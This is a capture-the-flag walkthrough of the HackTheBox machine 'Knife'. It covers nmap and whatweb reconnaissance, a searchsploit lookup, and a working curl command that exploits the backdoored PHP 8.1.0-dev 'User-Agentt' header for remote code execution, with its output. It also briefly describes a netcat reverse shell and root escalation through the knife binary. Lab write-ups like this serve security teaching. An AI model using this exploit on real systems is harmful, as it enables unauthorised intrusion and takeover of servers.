Knife - HackTheBox
I started with an Nmap scan for open ports.
┌──(root💀kali)-[/home/kali/HTB/Knife]
└─# nmap -sS --min-rate=5000 -n -vvv --open -Pn 10.10.10.242 -oG allPorts
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-29 10:07 EDT
Initiating SYN Stealth Scan at 10:07
Scanning 10.10.10.242 [1000 ports]
Discovered open port 22/tcp on 10.10.10.242
Discovered open port 80/tcp on 10.10.10.242
Completed SYN Stealth Scan at 10:07, 0.41s elapsed (1000 total ports)
Nmap scan report for 10.10.10.242
Host is up, received user-set (0.11s latency).
Scanned at 2021-08-29 10:07:20 EDT for 0s
Not shown: 998 closed ports
Reason: 998 resets
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.50 seconds
Raw packets sent: 1012 (44.528KB) | Rcvd: 1012 (40.488KB)
Perform another scan to detect the version of each open service found.
┌──(root💀kali)-[/home/kali/HTB/Knife]
└─# nmap -sC -sV -p22,80 10.10.10.242 -oN targeted
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-29 10:09 EDT
Nmap scan report for 10.10.10.242
Host is up (0.034s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.28 seconds
I saw that a web server was running, I accessed it and found the following.
The sections that were there were not buttons so there was little I could do, I did a whatweb to the web server to see that it was running.
┌──(root💀kali)-[/home/kali/HTB/Knife]
└─# whatweb http://10.10.10.242/
http://10.10.10.242/ [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.10.10.242], PHP[8.1.0-dev], Script, Title[Emergent Medical Idea], X-Powered-By[PHP/8.1.0-dev]
I found that it was running PHP, that caught my attention, I sent a GET request and it seems that whatweb reports it from the X-Powered-By header.
I looked for any exploit for that version and found one that guaranteed arbitrary code execution.
┌──(root💀kali)-[/home/kali/HTB/Knife]
└─# searchsploit PHP 8.1.0-dev
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Concrete5 CMS < 8.3.0 - Username / Comments Enumeration | php/webapps/44194.py
cPanel < 11.25 - Cross-Site Request Forgery (Add User PHP Script) | php/webapps/17330.html
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit) | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC) | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution | php/webapps/46459.py
FileRun < 2017.09.18 - SQL Injection | php/webapps/42922.py
Fozzcom Shopping < 7.94 / < 8.04 - Multiple Vulnerabilities | php/webapps/15571.txt
FreePBX < 13.0.188 - Remote Command Execution (Metasploit) | php/remote/40434.rb
IceWarp Mail Server < 11.1.1 - Directory Traversal | php/webapps/44587.txt
KACE System Management Appliance (SMA) < 9.0.270 - Multiple Vulnerabilities | php/webapps/46956.txt
Kaltura < 13.2.0 - Remote Code Execution | php/webapps/43028.py
Kaltura Community Edition < 11.1.0-2 - Multiple Vulnerabilities | php/webapps/39563.txt
Micro Focus Secure Messaging Gateway (SMG) < 471 - Remote Code Execution (Metasploit) | php/webapps/45083.rb
NPDS < 08.06 - Multiple Input Validation Vulnerabilities | php/webapps/32689.txt
OPNsense < 19.1.1 - Cross-Site Scripting | php/webapps/46351.txt
PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution | php/webapps/49933.py
Plesk < 9.5.4 - Remote Command Execution | php/remote/25986.txt
REDCap < 9.1.2 - Cross-Site Scripting | php/webapps/47146.txt
Responsive FileManager < 9.13.4 - Directory Traversal | php/webapps/45271.txt
Responsive Filemanger <= 9.11.0 - Arbitrary File Disclosure | php/webapps/41272.txt
ShoreTel Connect ONSITE < 19.49.1500.0 - Multiple Vulnerabilities | php/webapps/46666.txt
Western Digital Arkeia < 10.0.10 - Remote Code Execution (Metasploit) | php/remote/28407.rb
WordPress Plugin DZS Videogallery < 8.60 - Multiple Vulnerabilities | php/webapps/39553.txt
Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Cross-Site Scripting | php/webapps/46815.txt
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
I transferred it to my machine with the -m parameter of searchsploit.
┌──(root💀kali)-[/home/kali/HTB/Knife]
└─# searchsploit -m php/webapps/49933.py
Exploit: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
URL: https://www.exploit-db.com/exploits/49933
Path: /usr/share/exploitdb/exploits/php/webapps/49933.py
File Type: HTML document, ASCII text, with CRLF line terminators
Copied to: /home/kali/HTB/Knife/49933.py
After seeing what it was doing behind the scenes, I found that it sends a request adding a new header called User-Agent that executes the following statement zerodiumsystem("command");
and you win RCE.
I did it manually with curl.
┌──(root💀kali)-[/home/kali/HTB/Knife]
└─# curl -X GET http://10.10.10.242/ -H "User-Agentt: zerodiumsystem('whoami');"
james
<!DOCTYPE html>
<html lang="en" >
<head>
<meta charset="UTF-8">
It seems that it worked, it executed the command I wanted and reported the “output” in the first line of the page’s source code, now I only needed to gain access to the system, so I started a reverse shell using netcat, for this I used one of mkfifo.
And I gained access to the machine.
ESCALADA DE PRIVILEGIOS
I did some TTY testing and found that the knife binary could be run as the root user.
I went to gtfobins and found that it could be scaled by running the knife binary.
I ran it and gained access to the machine as root and could now see the “flag”.
Leave a comment